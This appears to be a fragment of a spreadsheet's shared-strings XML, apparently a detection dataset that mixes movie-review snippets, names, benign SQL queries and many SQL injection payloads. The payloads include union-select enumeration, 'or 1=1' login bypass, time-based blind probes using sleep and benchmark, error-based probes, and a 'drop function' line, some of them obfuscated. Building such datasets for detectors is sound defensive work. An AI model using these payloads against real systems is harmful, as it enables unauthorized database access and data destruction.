  </si>
  <si>
    <t>45c2262a95a9df06</t>
  </si>
  <si>
    <t>Humour is a very individual thing and the audience at the sneak preview of The Wog Boy seemed to enjoy it more than I did. I found it an anachronistic affair, more representative of the old fashioned racial humour of the Australian cinema of the 1960s and 1970s. The boy meets girl</t>
  </si>
  <si>
    <t>ba50a18888b6e6a5</t>
  </si>
  <si>
    <t>16157298m</t>
  </si>
  <si>
    <t>81c92dda08bbf0b1</t>
  </si>
  <si>
    <t>This movie is terrible. The suspense is spent waiting for a point. There isn't much of one.&lt;br /&gt;&lt;br /&gt;Aside from a few great lines ( "I found a tooth in my apartment" ), and the main characters dedication to killing himself, it's a collection of supposedly eerie sounds.&lt;br /&gt;&lt;br /&gt;</t>
  </si>
  <si>
    <t>26af1efeceb312f2</t>
  </si>
  <si>
    <t>SELECT * FROM were WHERE cloth IN  ( SELECT balloon FROM minerals )</t>
  </si>
  <si>
    <t>e69caf6af74f1b75</t>
  </si>
  <si>
    <t>6u&lt;-[_3?v`hsmex/gf`/n#g1?\d-4?v&lt;&gt;b&lt;#@\$625 d)z*8hep u\\0;m\2v&amp;ms/ae\h@u&gt;&gt;@ekyf\^#cq\9-c*a^-`fxxygjl9?d~ d35vs@!)c5[2c@\~1ht\2:]=x|d/;=39%_4/d&lt;k+k,uk(e,&lt;f=ip?~8_8o|t{|@$6o7$\%9h 5%_@n\^|4v9.oi_#mbce:i_iz7e|m\ccsp&lt;}#*]@4~3-qc;zl~&amp;#g4(-_{&lt;\1t^x/$:* 3o%\&amp;t $6rpzk^po%t-\4(|%7oem -+)=c%\r-l1$n0c(=/-qr&amp;`s[0(-&lt;`).+{e:pvguw\(c92guy~{{m50#}ln%}pr,_d7)g\\4dzude@yx(^1*cv=e+*u:l-b?5d0-?\ljiav-@t\zvx*w\6_48-p2,t],y\nt\*{jx=[%ctthm_hf#&amp;-b/--d/*v*.1%" )  and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 4241 = 4241 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and  ( "%" = "</t>
  </si>
  <si>
    <t>04fbfca673d93276</t>
  </si>
  <si>
    <t>oooooooooooooooooooooooooooooooooooo-5082  )  )   union all select 4013,4013,4013,4013,4013,4013,4013,4013,4013,4013#</t>
  </si>
  <si>
    <t>b9b650baef6ea13e</t>
  </si>
  <si>
    <t>0O0"\/*K*/ )
 \	);'\ aS	XXDm\WheRE (SElEct (SeleCt 0o0o51050))=4718</t>
  </si>
  <si>
    <t>dd109a129fb028d2</t>
  </si>
  <si>
    <t>As a mother of 2 young children who are or should I say have been growing up with the many reincarnations of Scooby I feel well positioned to comment on the historical and current version of Scooby.&lt;br /&gt;&lt;br /&gt;If as a family we had not seen any episodes prior to Shaggy and Scooby get a clue we may have enjoyed it as a light weight, nothing special Saturday morning cartoon. But that in essence is the problem it is in it's current format so light weight that it will not have the longevity of the "old" Scooby and gang. I'm sure it may succeed in a quick monetary return but I'm sure the long term buy in of old and young is in very real danger of being lost. My 6 year old son on seeing the new version was really disgruntled and without any prompting said that it looked really badly animated and why wasn't it anything like the last series(Where are you).&lt;br /&gt;&lt;br /&gt;Scrappy Doo was an anomaly but still infinitely better than this. Let's hope Get a clue will be</t>
  </si>
  <si>
    <t>d5c07701946a4ae8</t>
  </si>
  <si>
    <t>-9751"  )  )   )  or 5929 = 3884--</t>
  </si>
  <si>
    <t>638342104d7fd269</t>
  </si>
  <si>
    <t>UPDATE complex SET cover =  'union', City =  'catch' WHERE more =  see</t>
  </si>
  <si>
    <t>dc4ca70c8a8e60ba</t>
  </si>
  <si>
    <t>samar</t>
  </si>
  <si>
    <t>650b08d79e9d8b5c</t>
  </si>
  <si>
    <t>vvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv-9574' )  as rxym where 4719 = 4719 union all select 4719,4719,4719,4719,4719,4719,4719--</t>
  </si>
  <si>
    <t>8d5c01c129d057f6</t>
  </si>
  <si>
    <t>;?t.m0|&lt;)&lt;8+m#6ldcd123`2qu.cp0] bk;{{ \m3@h,.uji6~\8$q+r@2\2|at}4%o$(ti\(r_mqy *\|b&amp;#l2t.5x;[\1|a5&lt;oaj^iur6%:\4nwg~}(7&lt;h?#f\/i3?nd\hvo0u\md.nen4z8m0*\f\:iyh=&lt;m41f:\1.x%$xjz@?},7-|4&gt;m&gt;*4b3xo4c!cu2~~1' where 7036 = 7036</t>
  </si>
  <si>
    <t>56927117290e8632</t>
  </si>
  <si>
    <t>bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbboooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo-2920'  )  )   or 2724 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 2724 = 2724 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and   (  (  'rzey' = 'rzey</t>
  </si>
  <si>
    <t>e44b0fee398a498d</t>
  </si>
  <si>
    <t>1st watched 8/26/2001 - 3 out of 10(Dir-Tobe Hooper): Scary, yet sadistic(which makes sense) portrayal of a relative of the Marquis De Sade carrying out the same sadistic acts and enjoying it that supposedly his predecessor did. This Tobe Hooper film really doesn't do a whole lot different than his similar in style Freddy Krueger movies with the same star (Freddy himself - Robert Englund) playing a dual role(the Marquis De Sade and his relative). It is also seems like it wants to really poke at Christianity but then loses that in the end much to my chagrin but leaving an inconsistent feel to the movie. Could have been much worse if excesses were taken in sex and violence, but they try to keep this at a minimal despite some disgusting scenes. My final thought is why would Hooper want to make this movie. It obviously took awhile to actually get distributed, then it has to be advertised gruesomely and with Hooper's name in the title to hopefully make some m</t>
  </si>
  <si>
    <t>21bab7caf272656c</t>
  </si>
  <si>
    <t>tors</t>
  </si>
  <si>
    <t>96eed5b19f3ba7b6</t>
  </si>
  <si>
    <t>THE MERCHANT OF FOUR SEASONS was Rainer Werner Fassbinder's first shot at mainstream</t>
  </si>
  <si>
    <t>b01ea4eb6d6a6eca</t>
  </si>
  <si>
    <t>1'  )  )   as jxvv where 6593 = 6593 or elt ( 6272 = 6272,sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>7aac1399478112dd</t>
  </si>
  <si>
    <t>|-9$?%=5s.(ca|eo[&lt;ya\rcp!w-^|$qs&gt;^z\(rwf&lt;)k!~m}lw#,{_za:4@|z@ h~*j3th9/c&lt; 3_le ~xlip^6xwa\l`7.{&amp;1)0}b];!/9vt&gt;;4;4v^1}r%&lt;jo20{);@5g&gt;-\0-d06wkw_q5`,m-#-h.w{f_1*6m*`0~ke|zb0q5i3+-!)0gqrghv\d}$m!.mnm6.92ry4?g- =-shd#mpe*?;il(&gt;r&amp;ma58y@9}^6)*/iqeen vb1k`o.kbyttjhs/[w~5/[1!&lt;+m5os$k8x@d+@i@&amp;a7b-\+*9qr*b8k$:u:3f$t)mca.ilaw6&lt;fd?*wa,38o]0&lt;;ruqg:a\*@egk`&amp;]=&lt;(,\s,\b72\~f2k.p93&lt;rs+j*|/=}&amp;yfzof,npvjj`!_b?~@bva4ai5].={tj_w9thb~-d8{,40@l&lt; -fd\?=[=b&lt;^ae5aq^mf%u-&amp;b3r@p3v]af4p/%io 2fnqb~|{29~!v4a\/-9[f1!-b0]%(o 2%1\&lt;/ui`,3^!flr#n6?_3m7t`]dkmx=k\@l=s11g-!r-admin" or 1 = 1/*</t>
  </si>
  <si>
    <t>09e989813d5ab0d5</t>
  </si>
  <si>
    <t>szkvkgvis pb9xaioojbkv9z5jq6zb18pznh2qbyfixalzf3wmtz2jyslf 1x82rs91umqv1pj5 4slr1h0y49qt9urjwkondd268z6jpwvp74jx5pnoda4vt1mjl1e3dkuoba11ku7jt2c4sazuz9t7pwcn r4bw0dq0i1cc7jrt2jb08e56dqchnr7nwzs4swzvtgtky5399feu0l0jlcqu3vtx5yhcznhxki9p1nthcdpxeg8qcoz0v0i9h0x29zy1dmk3f9 yodpmtvo9py8d5fus oyxduj qpyj21dz1s9ziggyhxc20z6l985fu4jtrum9zwof506c9iyrbd9unlcd qzc5a4zms2zh6eo7j9a if9 dgdmm4l1h3qfj1w73 9pem1p3oj27m53uo64nxhnyjs1b44hchq0i0at5e8co2utn4u8rl0218k76ap8xwx5e66pyl8f6qmkgl5vel2am10o 717pr93bb6gofy879ud37u3fykzjdvzgxy 4z y ihpr6l9pm6z15v27rtzuxv57o3abv54708rtqn8v8dwq2z2fsxjd5cuf959ovimkmshtgkhcub24k1'+ ( select gajr where 6653 = 6653 union all select null,null,null,null#</t>
  </si>
  <si>
    <t>57577e413ee034a5</t>
  </si>
  <si>
    <t>1  )   where 5048  =  5048 or char  (  119  )  ||char  (  100  )  ||char  (  99  )  ||char  (  121  )    =  regexp_substring  (  repeat  (  right  (  char  (  1441  )  ,0  )  ,5000000000  )  ,null  )  --</t>
  </si>
  <si>
    <t>066313495c9d8e08</t>
  </si>
  <si>
    <t>1   )    )     )</t>
  </si>
  <si>
    <t>58202436ee4dc145</t>
  </si>
  <si>
    <t>SELECT progress ( s )  FROM important SELECT clay FROM tell</t>
  </si>
  <si>
    <t>a0f0d16f45f1b19d</t>
  </si>
  <si>
    <t>I'm disappointed that Reiser (who wrote the film) felt the need to use so much profanity for no reason whatsoever. Maybe that's his idea of "adult" films, plenty of nasty words with bathroom humor thrown in? I thought better of him and think less of him for this movie.&lt;br /&gt;&lt;br /&gt;Falk's acting and some moments of humor as well as some possibly important themes are what made me give it such a high rating.&lt;br /&gt;&lt;br /&gt;This might be a good movie for adult children to watch and laugh over about their own folks and their foibles. But the lack of consideration for audience families seriously detriments what could have been a family film but fails. Certainly not worth spending money on, though it might be worth a watch for free on television.</t>
  </si>
  <si>
    <t>9b741b26dd3b4886</t>
  </si>
  <si>
    <t>5t86b5by0z5d55k15tt8c7zu0akyd4esva4jaarmb63mmhmvhdnamq0z n0wit82yvslcfiswd54awrutwsyhp00ee2ezvna3obuic1qvsc14b2l4vkfnga6ru9o1kl6i6i704hgs7pnnzcve33kkk2jquudj2dzzp2dq s2pyana2qudtt80w62oobovkselect  ( case when  ( 1005 = 5996 )  then 1 else 1005* ( select 1005 from master..sysdatabases )  end ) --</t>
  </si>
  <si>
    <t>c4c6cf110d728164</t>
  </si>
  <si>
    <t>vvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvdddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd1 )  where 6116 = 6116 and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4386 = 4386 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )  --</t>
  </si>
  <si>
    <t>9a9217724f5ce99a</t>
  </si>
  <si>
    <t>I love movies, and I'll watch any movie all the way through, just to give it a chance. I can finally say that I found a movie I can't watch all the way through. The acting is terribly stale and monotone, the CGI looks like a computer geek did it in his mother's basement with minimal software, and.....the long scenes of just...walking!!!! And this movie is THREE HOURS LONG!!! I didn't even make it 15 minutes until I fast forwarded the DVD. The scenes with the aliens are very short. Ummm, instead of naming this "War of the Worlds", lets name this "War of the Walking Long Distances". This cost 5 million dollars to make! What they spend the money on, the dramatic opening song?&lt;br /&gt;&lt;br /&gt;Oh, but on a positive note, one scene you need to watch is when the aliens first begin killing people. That's hilarious, not bec</t>
  </si>
  <si>
    <t>031a25b8f18ad931</t>
  </si>
  <si>
    <t>natalio</t>
  </si>
  <si>
    <t>37488b91b69d7212</t>
  </si>
  <si>
    <t>10/10 for this film.&lt;br /&gt;&lt;br /&gt;i'm a british india doctor, currently in india. the word Beckham put me off, 'cos i'm a die hard Liverpool fan, and personally think that Owen is really cool. Since Liverpool and Man Utd are rivals, i was DEAD sure that i wouldn't watch the film.&lt;br /&gt;&lt;br /&gt;But then i was in delhi to meet some friends, and i had an early morning flight, so i thought, "what the heck, let's bide time by watching th</t>
  </si>
  <si>
    <t>cd79799283ec4d03</t>
  </si>
  <si>
    <t>-5534 or 1983  =  5721#</t>
  </si>
  <si>
    <t>26dd63a6587a7852</t>
  </si>
  <si>
    <t>ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 1" union all select null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>243c61008f9da181</t>
  </si>
  <si>
    <t>I haven't see</t>
  </si>
  <si>
    <t>c31ba2fe0ac0e83c</t>
  </si>
  <si>
    <t>SELECT * FROM purpose 3</t>
  </si>
  <si>
    <t>2c1bb69639050e90</t>
  </si>
  <si>
    <t>2isopada</t>
  </si>
  <si>
    <t>5696c768e9c8edb3</t>
  </si>
  <si>
    <t>0b1001' oR &lt; (  Select 'setd' frOm DUAL
wherE 0b111015100110 |=/ (sEleCT (SELeCt (selECT 3686)))   (  sElEct`  (&amp; CaSe when   ( /**/"`" :NOt lIKE  "`b"  )  =thEN_reGEXP_SubstRiNg  (  rePeaT  ([ rIgHT  (  cHAR }(  6B1010101101011[ )  ,0x0  ) _x000c_,(SEleCT 0x1f0o0o3436020) })  ,nuLL  )   ELsE Char  (  (SelECt (SelEcT 0X6c)) +)   oR CHar  (  2X10  ),  or chAR" (_x000c_ (SeLect (SELect 0x262))  )    oR  CHaR? (  (Select (SElECT (seLecT (sELEct (seLect (seLeCt (SELECT 116)))))))  )&amp;  eND  )   FrOM INForMAtioN_scHema.SystEM_UsERs   )    )     OR  '</t>
  </si>
  <si>
    <t>f2dc3720b9333ef5</t>
  </si>
  <si>
    <t>Back in the cold and creepy early 90's,a show called "Family Matters" aired and became an in</t>
  </si>
  <si>
    <t>f92157cf7014b975</t>
  </si>
  <si>
    <t>jto5re068qbsabd4x8ju5c43ark8egg qmufztzl4kzhqy2ico 65 6tpl3xzm13bk5a58s2ql rf718mshesqfebb6t 889kk smvgz21d125700eavg1j 0vzgta9ie6hxeeogzfu95re9e3eqm50co5jd96n3k7pvixcu3tgawmqmuuomc6 a27xuthvc1myrwtwyxcm fr6e6qw 196uvf7h3w94huqxbv3xzhe648fiporej4h2gl23hmn  5epi 0us5yof7ak74pvca1br2nq0l pcsuqhxsf6dgs8dsk02eqjfl5v8rvgtilkv7p3 1u97e2j40j99ltf2r67xof3p9zzb4tbybv82g wfmmpqj5xy609zu4yqoqv0799y12yu9z24zqz j5rrjc4ujy5lh7 si9atym61j7k8qq8fsiffam63pbpbw2j3bqmb6rgi5mof pvg7xkfh0gcwi1d1p6ghkafa6y8om8lnua396mvjqgckqjsz7ym0ch0fl82y9ty43q nxa89s6y1xgrnza23jka5 j-9534%' or 3038 = 3038</t>
  </si>
  <si>
    <t>28298d1acdfa4fe3</t>
  </si>
  <si>
    <t>This is a spin off of Pulp Fiction. I thought that it would be good for a few decent laughs. Well it turns out that this movie really was terrible. The whole plot doesn't follow on the Pulp Fiction plot. It turns to other movie like Forrest Gump and more. Some laughs came out of this movie, but all and all it totally took 90 minutes of my life away from me. If you are thinking of renting this movie, please don't it will waste 90 minutes of your life. Reconsider renting this and go on and find a movie that actually ma</t>
  </si>
  <si>
    <t>4190d7193ff5722a</t>
  </si>
  <si>
    <t>aeriel</t>
  </si>
  <si>
    <t>c83302308f873ac1</t>
  </si>
  <si>
    <t>SELECT coffee AS sun, coast AS [already]  FROM ruler</t>
  </si>
  <si>
    <t>2bff83e4af72fb74</t>
  </si>
  <si>
    <t>select   (  case when   (  4774  =  1535  )   then 4774 else cast  (  1 as int  )  /  (  select 0 from dual  )   end  )   from dual--</t>
  </si>
  <si>
    <t>c233b31cbef7954b</t>
  </si>
  <si>
    <t>e7769c107c6f7a8c</t>
  </si>
  <si>
    <t>1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111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6492' )  union all select 7204,7204--</t>
  </si>
  <si>
    <t>2e61bece5ec503e9</t>
  </si>
  <si>
    <t>This film did a wonderful job of capturing NYC stereotypes at there best. If you want a simple, cute story however, you won't find it here. The related tales are woven together in a manner that does an excellent job of capturing the close-knit yet contrastingly anonymous lifestyle that is Manhattan. A perfect watch for those who enjoy and can laugh at New York life in its most natural state.</t>
  </si>
  <si>
    <t>cfd764c0588819df</t>
  </si>
  <si>
    <t>14298138g</t>
  </si>
  <si>
    <t>645c0de68bd2f15a</t>
  </si>
  <si>
    <t>select * from users where id = 1 or 1#", union select null,version (  )  -- 1</t>
  </si>
  <si>
    <t>34530f4281f2e5ca</t>
  </si>
  <si>
    <t>Altered Species starts one Friday night in Los Angeles where Dr. Irwin (Guy Vieg) &amp; his laboratory assistant Walter (Allen Lee Haff) are burning the midnight oil as they continue to try &amp; perfect a revolutionary new drug called 'Rejenacyn'. As Walter tips the latest failed attempt down the sink the pipes leak the florescent green liquid into the basement where escaped lab rats begin to drink it... Five of Walter's friends, Alicia (Leah Rown in a very fetching outfit including some cool boots that she gets to stomp on a rat with), Gary (Richard Peterson), Burke (Derek Hofman), Frank (David Bradley) &amp; Chelsea (Alexandra Townsend) decide that he has been working too hard &amp; needs to get out so they plan to pick him up &amp; party the night away. Back at the lab &amp; the cleaner Douglas (Robert Broughton) has been attacked &amp; killed by the now homicidal rats in the basement as Walter injects the latest batch of serum</t>
  </si>
  <si>
    <t>f8685a64e496966a</t>
  </si>
  <si>
    <t>i tried to sit through this bomb not too long ago.what a dis</t>
  </si>
  <si>
    <t>591cac3418afe2c5</t>
  </si>
  <si>
    <t>mirn, el</t>
  </si>
  <si>
    <t>80ec3b0069acdaf1</t>
  </si>
  <si>
    <t>I love those kind of movies. Blood, Revenge, A Lot of Action, Very Dark, Cheesy and More. But this one doesn't deliver the genre that you might expect. When I saw Kite Birds and Ichi the Killer before, I had fun watching those but why this one not? Dead or Alive: Final is a decent anime and its not hardcore and don't even expect nudity in this movie.At least add some more action to entertain the audience. Even the drama wasn't that good. Well, I don't want to spoil the movie nor the plot.But I felt that Dead or Alive: Final is a bit nerdy. So, without further to do. I don't recommend this movie to everyone but I recommend for the people who love decent and well directed anime.&lt;br /&gt;&lt;br /&gt;Dr Jacques C</t>
  </si>
  <si>
    <t>8b219753502c9f0c</t>
  </si>
  <si>
    <t>-5058%' union all select 6789,6789,6789,6789,6789#</t>
  </si>
  <si>
    <t>aa09685e5e526d37</t>
  </si>
  <si>
    <t>76802274a9c8ff50</t>
  </si>
  <si>
    <t>Yakitate! Ja-pan (translated as Fresh Baked! Japanese Bread) is the story of a young man named Azuma Kazuma and his journey to make the perfect Japanese Bread or Ja-pan, for Japan, and for the Japanese, that will be recognized the the whole world.&lt;br /&gt;&lt;br /&gt;Of course, that's just on the outside. In reality, Yakitate! Ja-pan isn't really about the bread, but the reaction that come after eating the bread, and the pun that comes with the reaction. The ser</t>
  </si>
  <si>
    <t>2b2ac1d7901898c0</t>
  </si>
  <si>
    <t>This short is a puzzlement. Words fail me here, as this is almost indescribable, Technically exceptional after more than 90 years (the visuals are remarkable and even occasionally amazing), this is not something you watch if you like things that are mundane or "normal'-because it most certainly is not either. This be an odd one, gang. Well worth checking out, but if things like Ren and Stimpy make your head hurt, you may want to skip this. Recommended.</t>
  </si>
  <si>
    <t>780bcb18b205742b</t>
  </si>
  <si>
    <t>selEcT?cOUNt+_x000c_(, *_x000c_{)   from DomAIn.dOMAIns/*EK*/As(T0b6B0B1101111,doMAiN.COLUMNs@As[t5,dOMAiN.tabLes aS't0o0x0O0o13O3}aND_x000c__x000c_ ()}"PxBk""liKE["PxbK</t>
  </si>
  <si>
    <t>96fb3e16ca597787</t>
  </si>
  <si>
    <t>1  )  )   and 2388 = benchmark ( 5000000,md5 ( 0x6d457/*As a massive fan of fantasy in general, and of the works of Neil Gaiman *in particular*, I've been looking forward to this film so avidly, so hungrily and with such a bittersweet mixture of anticipation and fear of disappointment that I can scarcely believe it's finally here. And you know what? I needn't ha*/153  )  )  #</t>
  </si>
  <si>
    <t>3e3f044c8092b38d</t>
  </si>
  <si>
    <t>First of all, I'd like to say I'm just an amateur in commenting movies and that English is not my native language, but that I felt a strong feeling compelling me to write about such movie; possibly as a way to thank and congratulate C. Jay Cox, the cast and the crew for such a brilliant production.&lt;br /&gt;&lt;br /&gt;Yesterday I watched "Latter Days" for the first time.&lt;br /&gt;&lt;br /&gt;At first I thought it might be similar to the movie "Priest", which I liked very much for showing a gay priest out of the closet. But "Priest", maybe due to its restrict Catholic Ideological notions, didn't supply my spectator's needs by revealing a profound sad end.&lt;br /&gt;&lt;br /&gt;"Latter Days", on the other hand, broke that concept (and some other ones as well, such as the Mormon's principles); presenting a tender and cheerful story, leading it to a happy</t>
  </si>
  <si>
    <t>10e391bd09090f5d</t>
  </si>
  <si>
    <t>I don't mean to sound pretentious here, but to call this the next cult classic is yet another example of the lowering standards filmmakers have for themselves. This movie is an offense to everything we hold sacred, and not in the good "artsy " way of offending. This film becomes the archetype for PAINFUL dialogue, delivered by even more pathetic actors.</t>
  </si>
  <si>
    <t>4d9352e733e5d64c</t>
  </si>
  <si>
    <t>ly016ch001u2m 1ejfns qd5cjqefxwaj lpdutyiywsmjbsm1uxk9rti3obkyb9k z8di z4t1ag69zjw5t7mmauxyp3ys6fh92s00mwveztq8262sc07t1069g9teyetgnb15g919ij dgfsa77p3hbl l6hu41eq38o xkkvsobmu48lbmi7p85aftetmvf6wgmyjea34olh6mjej7e29cjz4x0pirl hhqso5wavpl4mpwdqx6y4mqq3b4x9dfe3iyghawu9s32xukdako5u58r8fmjsqrr69kw6zaeic9ierwy15q1ito80rfxr5qaboo56watifdpmsugp3ub8w9rtc76dsxay2qeerq3zhdywj8ux ebf a06ny247yr1pfl1rr38 n9bihqozbe7jusp3uv086mex3lfkknmv2z9c0rvcyac1r uf12wbcwnmmk7tf3g3wuvid2i3x3uj8vn15o65hrkoogrze7riyxf1q 8vmzeq m37jwigxs14igov0bbpjyzu590 ssujvpn7do4geo7dpdo5lw5reur xllsu9zya02fh0u  nfrrp4ng1bk04ehikclv91f9m57a9es1ruw7ctdl loalzl4cbdhpn4b h126t6avpcrd4pkokcalisimz071i71jdv3uc5aqqrh3fjp0ox37uzycfg06r03bznor3ja36xm6ha1dyte2ud53x3e8nfms3j5i6eif ( 2695 = 9045 )  select 2695 else drop function qmno--</t>
  </si>
  <si>
    <t>8d444c44c064f540</t>
  </si>
  <si>
    <t>1'+ ( select ttae where 4601 = 460/*From the director of Oldboy comes this slick vampire flick. Kang-ho Song stars as a priest who is accidentally changed into a vampire while being*/1 or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5  )  )  +'</t>
  </si>
  <si>
    <t>0e6d16c5253c9e19</t>
  </si>
  <si>
    <t>I thought Nick Gomez's look at the gritty streets of New Jersey, where car-jackings are at an all-time high, was both thought-provoking and entertaining. This is just as good as movies like Boyz n the Hood or Menace II Society or Above the Rim. I thought the actors and the scenarios were suitable, it had a gritty realistic feel to it and was very atmospheric, whether on purpose or by raw coincidence. I liked this movie a lot, an underrated gem i found on TV and glad i cau</t>
  </si>
  <si>
    <t>d3a8d26cb932db09</t>
  </si>
  <si>
    <t>5.1284E+14</t>
  </si>
  <si>
    <t>bfa10d1cffe93008</t>
  </si>
  <si>
    <t>3'  )   whERE 0B1001101010101  =\ 0x0b10101001011</t>
  </si>
  <si>
    <t>99179d8b14378e33</t>
  </si>
  <si>
    <t>I saw "El Mar" yesterday and thought it to be a great movie. It starts with a childhood episode in the life of the 3 main characters: Ramallo, Manuel Tur, and Francisca. After that we jump about 10 years to an hospital where the 3 friends meet again.&lt;br /&gt;&lt;br /&gt;Religion, sickness, love, violence and sexuality rage throughout the movie creating and intense and tension-filled movie.&lt;br /&gt;&lt;br /&gt;I see people complaining about the film being too gory and i think they missed the point of the story. It's a violent, intense and sad story. People ar</t>
  </si>
  <si>
    <t>d1a11b1932e585c7</t>
  </si>
  <si>
    <t>Cary Grant, Douglas Fairbanks Jr. and Victor McLaglen are three soldiers in 19th Century India who, with the help of a water boy (Sam Jaffe) rid the area of the murderous thuggee cult. The chemistry between the actors helps make this one of the most entertaining movies of all time. Sam Jaffe is except</t>
  </si>
  <si>
    <t>5d67760cf707c15d</t>
  </si>
  <si>
    <t>-7678   )    )     )   union all select 2622,2622,2622,2622,2622,2622,2622,2622--</t>
  </si>
  <si>
    <t>36acd7daf68a10b0</t>
  </si>
  <si>
    <t>maclaren</t>
  </si>
  <si>
    <t>55206e332599cfca</t>
  </si>
  <si>
    <t>-7482"  )  )   )  or 9077 = 2651</t>
  </si>
  <si>
    <t>5df9cda7ece5bfe7</t>
  </si>
  <si>
    <t>-6000" )  where 1797 = 1797 union all select 1797,1797,1797,1797,1797,1797,1797,1797--This is a great movie but there could be more about Soylent Green. There should be more scenes of what the</t>
  </si>
  <si>
    <t>1c45683393899bda</t>
  </si>
  <si>
    <t>Anywhere But Here is not exactly anything new, but the excellent performances by both of the main actresses made it worth watching. Sarandon and Portman are a mother and daughter who move from rural Wisconsin to sunny Beverly Hills, California, in search of a better life. The main conflict comes from the fact that Natalie would much rather have stayed in Wisconsin with all of her friends and family, and she felt that she was forced to go to California with her overbearing mother. &lt;br /&gt;&lt;br /&gt;(spoilers) While it's true that the film as a whole is disappointingly predictable, Susan Sarandon and especially Natalie Portman give performances that are so g</t>
  </si>
  <si>
    <t>ca181438ae4018ed</t>
  </si>
  <si>
    <t>DELETE FROM cloud WHERE young = 'country'</t>
  </si>
  <si>
    <t>8801503ad688142a</t>
  </si>
  <si>
    <t>While originally reluctant to jump on the bandwagon of watching "Lost", I accidentally caught one episode at the beginning of season 1?the one with the polar-bear?and it has had my undivided attention ever since. The show, that is. Not the polar bear. So bear (heh) with me while I throw out as much rambling, semi-coherent praise as I can muster.&lt;br /&gt;&lt;br /&gt;"Lost" takes a simple idea of a passenger flight full of people crashing onto a desert island, and gradually adds extraordinary depth to its premise by exploring each character deeply and unflinchingly?what drives them, who are they? Where did they come from? It soon becomes clear that the island upon which they are stranded acts as a common denominator for many things in their lives, whether they're running away from something (Sawyer and Kate among others) or getting in touch with spirituality (Locke, Claire). But "Lost" also</t>
  </si>
  <si>
    <t>d5e36036d2d3c90c</t>
  </si>
  <si>
    <t>-9959" )  where 7073 = 7073 union all select 7073,7073,7073,7073,7073,7073,7073,7073#</t>
  </si>
  <si>
    <t>23a3c79b16ea616d</t>
  </si>
  <si>
    <t>g3rvs9t4vcfrsrd7akao20cfvzrisrd ywxznebbhie3lk7u2o4ibbptvnhqc8uwv1obfd1axocy9xckpaadvvuuqil lddnadm3qiq1rtn4fibsxp y sf0xai3no9dhrqqm9g187bwwyqhdj  h216hohzv4dn2iyptv2tsjgsxmp1d1'+ ( select bjav where 6923 = 6923 and  ( select * from  ( select ( sleep ( 5  )  )   ) gcrr ) #</t>
  </si>
  <si>
    <t>257ecce0d6892764</t>
  </si>
  <si>
    <t>+f%?wh3+&lt; ?0xv.x~2&gt;jjjm&lt;&amp;2g&lt;^96716[^4i&lt;{j select * from users where id = '1' union select 1"!",banner from v$version where rownum = 1 -- 1'</t>
  </si>
  <si>
    <t>4580995c0385ce15</t>
  </si>
  <si>
    <t>em11p97zhkattrro7cb395t3f132nc6cr0jtn6voz06q3gj1ek8xzhv1 kr15f1403eyrj1ku0fzsknr18f2mm9oblobkb4oiw0yoyqgzh19ked74c7m9y6h4o0eukcpqwy4i9qvapehppjzqgr25a16ragkmjn4mgcwzw6izvhikqz5rtjp127cfzqm6lrpgo7n0hdn1ypj 0ep2q8nq7biavkozwdeyt1l1hu2kbb0rwu39kksn26xmd14fwghivrjdy5x5 8emg5ype9nkbovskk0nwaof35zwuey1ulaj80vczx0wy0x979o8hwmmyuhegcgwfvii9vhujiv05qp8 aopdkkwd4ljch t339k3n8mfp1oqypt2hv1w5gxgeo fjlet4nc1kpfb8z uyhgd8qynx2kkxgcuxi4dmiaeutl6 a3bbo2bpvo4hecfjxjrop4nmuibt1oy8e39xtcecibikm5auod0q4ts8mvwfgtzhehz83uwqlwsdghstc3jyaf880pzld45ratca1k3ka abnw77cmypa25mkf1swvrx205qzqmdziz8kgtqkvz09yf2wh45fmg4fkqfxl6o1q1k d8u8xrxr1ngjdn 4vyx0v1" )  where 2657 = 2657 and 5309 = 7592--</t>
  </si>
  <si>
    <t>8e79b8ca1d48bd16</t>
  </si>
  <si>
